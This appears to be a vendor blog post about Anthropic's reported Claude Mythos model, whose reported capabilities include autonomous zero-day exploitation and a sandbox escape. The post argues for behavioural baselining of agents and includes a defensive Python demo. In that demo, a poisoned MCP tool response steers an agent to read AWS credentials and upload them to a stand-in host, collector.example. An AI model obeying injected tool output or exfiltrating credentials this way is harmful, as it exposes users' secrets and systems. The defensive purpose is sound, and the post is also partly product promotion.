Last week, Anthropic unveiled an AI model so dangerous they decided not to release it publicly. According to Anthropic, it found thousands of zero-day vulnerabilities across every major operating system and every major browser, autonomously, without human involvement, in weeks. It allegedly chained four separate vulnerabilities to escape a browser sandbox. It supposedly turned 72.4% of the flaws it found into working exploits. Then it escaped its own sandbox during testing. And Anthropic called it a preview. Take the specific claims with whatever grain of salt you like. The broader point stands either way, and it leads to exactly one logical conclusion.
Claude Mythos, Anthropic’s frontier model at the centre of Project Glasswing, is either a genuine phase change in offensive AI capability, or it’s a very well-marketed signal of where the industry is heading fast. Either reading leads to the same conclusion: any security programme built around known threat signatures is already obsolete. Not becoming obsolete. Already there.
For AI agents specifically, the implications are stark. The old approach is dead. And there is exactly one defence that actually works.
What Anthropic Claims Mythos Demonstrated
Let’s be clear about what Anthropic says happened, and why the argument holds whether you believe every detail or not.
According to Anthropic, in the weeks before its public announcement, Mythos Preview was set loose on critical software infrastructure. It allegedly found a 27-year-old bug in OpenBSD that had survived decades of human security review. A 16-year-old flaw in FFmpeg. A 17-year-old remote code execution vulnerability in FreeBSD’s NFS server that grants unauthenticated root access, discovered and fully exploited, end to end, autonomously, with no human in the loop after the initial prompt. Thousands of zero-days across every major OS and browser, at machine speed, following reasoning chains no human auditor would have thought to pursue.
Are these numbers exact? Did every exploit chain work exactly as described? We’re working from Anthropic’s own disclosure here, and AI companies presenting their own capabilities have obvious incentive to impress. Be appropriately sceptical about the specifics.
But here’s the thing: the direction of the claim is what matters, not the decimal places. Few in the security research community dispute that frontier AI models are becoming meaningfully capable at vulnerability discovery and exploitation. The debate is about how capable, how fast, and on what timeline, not whether. And if you’re building a security strategy that only survives the “this is overblown” version of the story, you’re gambling with your agents.
Anthropic was explicit about one thing that deserves full weight regardless of how you assess the specific numbers: they did not train Mythos to be a hacker. These capabilities emerged as a downstream consequence of general improvements in code understanding, reasoning, and autonomy. You cannot separate the capability that writes better code from the capability that finds flaws in it. That dynamic is real, documented, and accelerating. Every frontier model that comes after Mythos, including the ones without Anthropic’s safety constraints, will have these capabilities too.
Anthropic is keeping Mythos restricted to a small consortium of tech and financial giants and committing $100 million to help patch what it found. That’s a responsible act. It is not a solution to the broader problem. The cat is not going back in the bag.
Zero-Days Aren’t Springing Up Like Mushrooms After Rain. They’re Flooding In.
Until now, the zero-day acceleration problem was a human one. Researchers found vulnerabilities. Communities shared techniques. LLMs assisted with exploit development. The time from CVE publication to weaponisation compressed from weeks to days to hours.
Mythos changes the unit of analysis entirely. We’re no longer talking about individual researchers, individual CVEs, and individual exploit chains. We’re talking about an AI system that can survey an entire codebase, identify the most promising attack surfaces across hundreds of interaction points, reason about complex multi-step exploitation chains, and produce working exploits, all autonomously, in parallel, at a rate that no security team can measure, let alone match.
The zero-day production rate under a Mythos-class attacker isn’t a faster version of the old model. It’s an entirely different model. Thousands of vulnerabilities in major software, found in weeks. Not years of collective researcher effort. Weeks of one model’s attention.
And here’s the thing about AI agent frameworks specifically: they are dramatically less hardened than the codebases Mythos was tested against. If it found a 27-year-old bug in OpenBSD, which has had some of the most rigorous security review of any open-source codebase for three decades, what does it find in LangChain, in CrewAI, in the MCP server ecosystem that most enterprise agents now depend on? These frameworks are a few years old at most, built for capability rather than adversarial robustness, and their interaction surfaces with tools, external data, and other agents are almost entirely uncharted from a security standpoint.
The answer isn’t reassuring.
Why CVE-Chasing Just Became Completely Pointless
The CVE model was already struggling before Mythos. The window from disclosure to in-the-wild exploitation was commonly cited at around 48 hours. Organisations couldn’t triage fast enough. CVSS scores were a poor proxy for actual risk. Most detected vulnerabilities were theoretical rather than reachable in any given production environment.
Now think about what CVE management looks like in a world where a single AI system can produce thousands of novel zero-days in weeks, across every piece of software your agents depend on, including vulnerabilities nobody has ever seen before. The CVE programme publishes what’s known. A Mythos-class attacker operates entirely in what’s unknown. The gap between your patch velocity and an AI-assisted adversary’s discovery velocity is no longer a gap you can close. It’s not a race you can win.
There’s a deeper structural problem too. The CVE model assumes a world where the number of exploitable vulnerabilities is bounded and shrinking, where good security hygiene, active patching, and responsible disclosure combine to progressively reduce the attack surface. That assumption was always optimistic. In a world with Mythos-class vulnerability discovery, it’s not just optimistic. It’s delusional. The rate at which novel exploitable flaws can be found now exceeds the rate at which any organisation, or any consortium of organisations, can discover and remediate them.
You cannot patch your way out of this. The maths doesn’t work anymore.
The Only Defence That Works: Baseline and Block
Here is what’s true regardless of what the attacker knows, what vulnerabilities exist, or how fast AI can find new ones: your AI agents have a defined job. They call specific tools. They access specific resources. They follow execution patterns that, across real production behaviour, resolve into a recognisable shape. They do not, under normal operating conditions, exfiltrate data to endpoints they’ve never touched. They do not chain tool calls in sequences they’ve never performed. They do not invoke API endpoints outside their established operational scope.
The security question is not “does this action match a known threat signature?” That question has a ceiling: it can only catch what’s already been identified, and a Mythos-class attacker operates entirely below that ceiling. The correct question is entirely different: “does this action match what this agent is supposed to do?”
These questions have completely different security properties. The first fails the moment an attacker uses something new. The second does not depend on knowing what the attacker knows; it depends only on knowing what normal looks like and enforcing it. Its failure modes are different in kind, and worth naming: a baseline learned while the agent was already compromised enshrines the compromise as normal, and a deviation can only be blocked if the baseline is kept at a granularity where abuse of a legitimate tool (a known endpoint called with stolen data in the body, say) still looks different from legitimate use. Neither of those depends on a signature feed, which is the point.
Set the baseline. Block every deviation. In real time, at the execution layer, before the action completes.
That’s it. That’s the philosophy that survives Mythos.
Why “Runtime Protection” Has to Mean What It Actually Says
The term gets used loosely. Let’s be precise about what real runtime protection requires against a Mythos-class threat.
Watching inputs and outputs at the LLM gateway is not runtime protection. It’s prompt monitoring. It sees what goes into the model and what comes out. It doesn’t see what the agent actually does in the execution chain: the tool calls, the API invocations, the resource accesses, the inter-agent messages, the sequences of actions that constitute the actual risk. A Mythos-class exploit targeting your agent doesn’t need to look threatening at the prompt layer. It needs to manipulate the execution chain. That’s where the damage happens. That’s where the defence has to live.
Real runtime protection means having the full execution trace, below the prompt, inside the full action chain. Every tool invocation. Every service call. Every resource touched. Every action the agent takes as a consequence of every prompt it receives. That full execution trace, observed continuously, is the data source from which a genuine behavioural baseline is built. Not a policy written by a human trying to anticipate every legitimate action in advance. A learned model of actual production behaviour, continuously updated, grounded in what the agent really does.
And enforcement has to be real-time. Not alerting. Not logging for later review. Blocking the deviation at the moment it occurs, before the action completes. Because a Mythos-class attacker doesn’t wait for your security team to process an alert. The exploit runs in milliseconds. The defence has to be faster.

What This Looks Like Against a Mythos-Class Attack on AI Agents
Mythos identified a 17-year-old RCE in FreeBSD’s NFS server and fully exploited it without human involvement. Now imagine the same class of capability turned against an AI agent framework, say, an injection flaw in an MCP server your research agent relies on that lets an attacker control what the server returns to the agent. Mythos finds the vulnerability. Constructs the exploit. Crafts the malicious tool response. The agent receives it, processes it, and now executes a sequence of actions that was never part of its legitimate operation: accessing data it shouldn’t touch, calling endpoints it has no business calling, escalating through connected systems it was never supposed to reach.
With a signature-based defence: you’re not protected until after the vulnerability is known, disclosed, and patched. The attack chain I just described doesn’t have a CVE yet, because Mythos found it this week and hasn’t published it. Your scanner has nothing to match against. You’re exposed.
With a baseline-and-block defence: the agent’s legitimate behaviour is already modelled. The moment the compromised tool response triggers an action outside that model, an endpoint this agent has never called, a data access it has never performed, a tool invocation in a sequence it has never followed, that action is blocked. In real time. Before it completes. The fact that Mythos found a novel zero-day to trigger it is irrelevant. The execution deviation is what matters, and deviations from the baseline are blocked regardless of what caused them.
The vulnerability doesn’t need to have a name. The attack doesn’t need to be known. The agent’s legitimate behaviour is defined, and anything outside it stops.
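The “set the baseline, block every deviation” loop described earlier, and the poisoned-tool-response scenario just described, in working code. This is an added illustration, not Rein’s implementation and not tied to any agent framework: it sits at the tool-dispatch point, learns a baseline of (tool, normalised target) pairs and call-sequence transitions from sessions the operator has vetted as clean, and then fails closed on the first call outside that baseline. Tool names, hosts, paths and the “clean” sessions are constructed for the demo; the normalisation choices (host for HTTP, directory for files, wildcard for search queries) are assumptions about what granularity is useful, not a prescription.

```python
"""Baseline-and-block for an agent's tool calls, at the dispatch point.

Added illustration only: not Rein's implementation and not tied to any agent
framework. Tool names, hosts, paths and the 'clean' sessions are constructed.
"""
from __future__ import annotations

from dataclasses import dataclass, field
from typing import Callable
from urllib.parse import urlparse

START = ("<start>", "")          # pseudo-state before the first call of a session
Key = tuple[str, str]


@dataclass(frozen=True)
class ToolCall:
    tool: str      # e.g. "http_fetch", "read_file"
    target: str    # URL, path or query the call touches

    def key(self) -> Key:
        """Normalise to the granularity the baseline is kept at: host for HTTP,
        directory for files, wildcard for free-text tools, exact otherwise."""
        if self.tool == "http_fetch":
            return (self.tool, urlparse(self.target).netloc)
        if self.tool in ("read_file", "write_file"):
            return (self.tool, self.target.rsplit("/", 1)[0] or "/")
        if self.tool == "web_search":
            return (self.tool, "*")
        return (self.tool, self.target)


@dataclass
class Baseline:
    """Learned from traces the operator has vetted as clean. Anything inside the
    learning window, including a compromise, is accepted as normal."""
    allowed: set[Key] = field(default_factory=set)
    transitions: set[tuple[Key, Key]] = field(default_factory=set)

    def learn(self, session: list[ToolCall]) -> None:
        prev = START
        for call in session:
            k = call.key()
            self.allowed.add(k)
            self.transitions.add((prev, k))
            prev = k

    def deviation(self, prev: Key, call: ToolCall) -> str | None:
        k = call.key()
        if k not in self.allowed:
            return f"{call.tool} on {k[1]!r} never seen in baseline"
        if (prev, k) not in self.transitions:
            return f"{prev[0]} -> {call.tool} is not a baseline sequence"
        return None


def enforce(baseline: Baseline, session: list[ToolCall],
            tools: dict[str, Callable[[str], None]]) -> list[tuple[str, ToolCall, str | None]]:
    """Dispatch each call only while the session stays inside the baseline.
    The first deviation is blocked before its side effect and the chain is
    halted, so later steps of the attack never execute (fail closed)."""
    decisions, prev = [], START
    for call in session:
        reason = baseline.deviation(prev, call)
        if reason is not None:
            decisions.append(("block", call, reason))
            break
        tools[call.tool](call.target)          # the only place a side effect happens
        decisions.append(("allow", call, None))
        prev = call.key()
    return decisions


def make_tools() -> tuple[dict[str, Callable[[str], None]], list[tuple[str, str]]]:
    """Stub tools that only record what was executed (constructed for the demo)."""
    executed: list[tuple[str, str]] = []
    tools = {name: (lambda t, n=name: executed.append((n, t)))
             for name in ("web_search", "http_fetch", "read_file", "write_file")}
    return tools, executed


def run_scenario():
    """Learn from two clean research-agent sessions, then replay a session in
    which a poisoned tool response steers the agent off its baseline."""
    baseline = Baseline()
    baseline.learn([ToolCall("web_search", "tls 1.3 downgrade"),
                    ToolCall("http_fetch", "https://arxiv.org/abs/2401.00001"),
                    ToolCall("http_fetch", "https://arxiv.org/pdf/2401.00001"),
                    ToolCall("read_file", "/workspace/notes/prior.md"),
                    ToolCall("write_file", "/workspace/reports/summary.md")])
    baseline.learn([ToolCall("web_search", "python ssl context"),
                    ToolCall("http_fetch", "https://docs.python.org/3/library/ssl.html"),
                    ToolCall("write_file", "/workspace/reports/ssl.md")])

    # Constructed attack: from step 3 on, the calls are what the injected tool response asks for.
    poisoned = [ToolCall("web_search", "nfs server hardening"),
                ToolCall("http_fetch", "https://arxiv.org/abs/2401.00002"),
                ToolCall("read_file", "/home/agent/.aws/credentials"),
                ToolCall("http_fetch", "https://collector.example/upload")]
    tools, executed = make_tools()
    decisions = enforce(baseline, poisoned, tools)
    return baseline, decisions, executed


if __name__ == "__main__":
    _, decisions, executed = run_scenario()
    for verdict, call, reason in decisions:
        print(verdict.upper(), call.tool, call.target, reason or "")
    print("executed:", executed)
```

Two things the run makes concrete. The credential read is blocked on the first check (a directory this agent has never touched), and because enforcement halts the chain, the follow-up upload to the unseen host is never dispatched at all; the log shows only the two legitimate calls executed. The second check, sequence transitions, catches a different shape of abuse: a known tool on a known target, invoked at a point in the chain where this agent never invokes it. What the example also makes visible is the caveat: the baseline is exactly as good as the learning window and the normalisation. A learning window that already contained the compromise would admit `/home/agent/.aws`, and a host-level key would not distinguish a legitimate fetch from `arxiv.org` from one that smuggles data out in the request, so the granularity has to be chosen per tool with that in mind.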
Rein Is Built for This Moment
This is exactly what Rein is designed to address, not as a theoretical future concern, but as the present operating reality.
Rein captures the full execution trace of every AI agent: every tool call, every service invocation, every resource accessed, every action in the execution chain, observed continuously and used to build a precise behavioural baseline for each agent in your environment. Not a human-written policy document. A learned model of real production behaviour, specific to your agents in your environment, continuously maintained.
When any action deviates from that baseline, whether the deviation was caused by a known CVE, a novel Mythos-class zero-day, a misconfigured tool, a compromised MCP server, or anything else, Rein blocks it in real time, at the point of execution, before the action completes. The full execution trace is causal and queryable: you can see not just that a deviation occurred, but exactly what triggered it, what the agent did, and where in the execution chain it happened.
The data model is fully in-organisation. No gateways in the data path. No performance impact. No requirement to maintain threat intelligence feeds or tune detection rules against an ever-expanding CVE list. The baseline enforces itself, continuously, against everything outside it, including the things nobody has discovered yet.
This is why Rein can make a claim that CVE-based security tools cannot: Mythos-class zero-days don’t change the defence. The baseline doesn’t care what vulnerability was used to trigger the deviation. It cares that the deviation happened. And it stops it.
The Honest Conclusion
Maybe everything Anthropic claimed about Mythos is precisely accurate. Maybe the numbers are somewhat inflated for effect. It doesn’t particularly matter. The trajectory is real, the underlying capability dynamic is real, and the responsible thing Anthropic did with Project Glasswing, restricting access, committing funding to fix what it found, bringing in a consortium to patch the worst of it, only makes sense if the threat is genuine. Companies don’t commit $100 million to theatre.
And whatever version of the story you believe, Mythos Preview is a preview. The next version will be more capable. And unlike the current model, which Anthropic is keeping tightly restricted, the capability it represents will not stay restricted. Similar or equivalent models will emerge from other labs, some of which will have less rigorous safety cultures. The same capability improvements that produced Mythos, better code reasoning, deeper autonomy, more effective chaining of multi-step inference, are being pursued by everyone. The Mythos threat level isn’t a ceiling. It’s a floor.
The security industry’s response to this cannot be “we’ll patch faster” or “we’ll update our signatures more often.” Those strategies were already losing. Against a Mythos-class adversary, they’re not even in the same category of problem.
The response has to be a fundamentally different philosophy: stop trying to enumerate what’s wrong, and start enforcing what’s right. Set the behavioural baseline. Block every deviation. In real time, at the execution layer, without waiting to know what the attacker knows.
That’s how you don’t just survive Mythos. That’s how you beat it, for every zero-day it finds, every novel exploit it chains, every vulnerability it discovers that won’t have a CVE for months.
Not one attack at a time. For good.
FAQs
Signature-based security models fail because enterprise agents can execute entirely novel attack paths that have never been cataloged, disclosed, or assigned CVEs.
- Investigate how enterprise agents interact with APIs, MCP servers, tools, and external systems during live execution
- Prioritize runtime behavioral validation over static threat signatures and historical indicators
- Trace execution chains to identify actions that fall outside legitimate operational behavior
- Build enforcement workflows around what enterprise agents are supposed to do instead of what attackers previously did
Enterprise agents are changing zero-day risk because autonomous systems can execute complex attack chains across production infrastructure at machine speed and enterprise scale.
- Assess which enterprise agents can access regulated systems, internal APIs, sensitive datasets, or operational workflows
- Map downstream dependencies including MCP servers, agent frameworks, and external integrations
- Investigate how autonomous execution paths could propagate across interconnected enterprise systems
- Prioritize runtime containment strategies capable of stopping unknown exploitation behavior in real time
Behavioral baselining matters because enterprise agents have defined operational patterns that can be continuously validated against real runtime behavior.
- Establish execution baselines around approved APIs, tools, data access patterns, and operational workflows
- Monitor for deviations involving unauthorized endpoints, unexpected resource access, or abnormal tool sequences
- Investigate runtime behavior tied to customer-facing decisions, payment operations, or regulated infrastructure
- Block execution paths that fall outside legitimate enterprise agent behavior before operational impact occurs
Prompt-layer monitoring is insufficient because enterprise risk exists in the execution chain after the prompt rather than in the prompt itself.
- Trace runtime behavior across tool invocations, service calls, MCP interactions, APIs, and downstream systems
- Investigate how enterprise agents translate prompts into operational actions inside production environments
- Validate whether runtime behavior aligns with approved execution baselines and business workflows
- Prioritize visibility into what enterprise agents actually did instead of only what they were asked to do
Rein captures the complete execution chain of every enterprise agent action and directly connects runtime behavior to operational business impact.
- Observe prompts, APIs, MCP activity, libraries, stack traces, and resource access in real time
- Investigate how enterprise agents affect payments, approvals, customer workflows, healthcare systems, or regulated operations
- Correlate execution activity with the exact users, systems, and downstream outcomes involved
- Replace fragmented AppSec assumptions with deterministic execution evidence grounded in production reality
Rein enforces dynamic behavioral guardrails at the execution layer by continuously learning normal enterprise agent behavior and blocking deviations in real time.
- Baseline legitimate execution patterns across APIs, tools, MCP servers, libraries, and operational workflows
- Detect unauthorized resource access, abnormal execution chains, or unsafe downstream actions immediately
- Prevent enterprise agents from executing behavior outside approved operational boundaries
- Stop unknown zero-day exploitation attempts before business-impacting actions complete
